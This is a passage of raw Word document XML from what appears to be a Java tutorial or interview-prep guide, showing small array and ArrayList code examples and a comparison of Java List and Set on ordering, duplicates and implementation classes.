          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0</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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F574692" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95"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457656"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BE5E7" w14:textId="63C4746A" w:rsidR="0060368C" w:rsidRPr="00CE4B95"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457656"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</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Output: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7395DF77" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95" w:rsidRDefault="0060368C" w:rsidP="0060368C">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List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483FF89" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95"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29650"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> numbers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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EEF6E5" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95"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29650"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>numbers</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add</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48829E03" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95"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29650"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>numbers</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add</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257BBD6A" w14:textId="371DC7B2" w:rsidR="0060368C" w:rsidRPr="00CE4B95"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29650"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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numbers</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get</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</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Output: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5734F2" w14:textId="17E41846" w:rsidR="0060368C" w:rsidRPr="00CE4B95" w:rsidRDefault="0060368C" w:rsidP="0060368C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FC11EF" w14:textId="088B8A5A" w:rsidR="005648DE" w:rsidRPr="00CE4B95" w:rsidRDefault="005648DE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc196307613"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00F93004" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ist and </w:t>
      </w:r>
      <w:r w:rsidR="00F93004" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>et?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="65945546" w14:textId="388EDB9E" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="002155B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06984802"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oth List and Set are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and represent collections of elements. However, they have key differences in terms of behavior and functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0F2595"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s a comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F218917" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0050129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260AF4D">
          <v:rect id="_x0000_i1403" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34950788" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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Order of Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544EAD85" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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st:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69639B3C" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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rdered</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A List maintains the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of elements. The order in which elements are added is the same order they will be retrieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47376C" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Example: In a List, if you insert elements in a certain order, they will be returned in the same order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025EFEC" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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dex-based Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lists allow access to elements via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., list.get(index)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71E15C" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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t:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF8234" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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nordered (for HashSet)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A Set does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guarantee any specific order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of elements. In the case of HashSet, elements are stored in an unordered fashion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292E16D" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Index-based Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Set does not allow accessing elements via an index (you can only iterate over it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DEF8F4" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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owever, some implementations of Set, such as LinkedHashSet, do maintain the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100160EA" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0050129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231FEFB">
          <v:rect id="_x0000_i1404" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEFB44C" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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Duplicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E47F6E" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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st:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF98529" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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llows Duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A List allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can add the same element multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48766CCE" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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You can add the same number to a list more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238FECB" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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t:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93710F" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A Set does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not allow duplicate elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If you try to add a duplicate element, it will be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366538F3" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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In a Set, if you try to add the same element twice, the second insertion will not modify the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64468D5B" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0050129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30FAD24">
          <v:rect id="_x0000_i1405" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9B60D" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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Implementation Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B9C9F7" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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st:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086003F" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ome common implementations of the List interface are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC424F7" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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rayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CAD46D" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
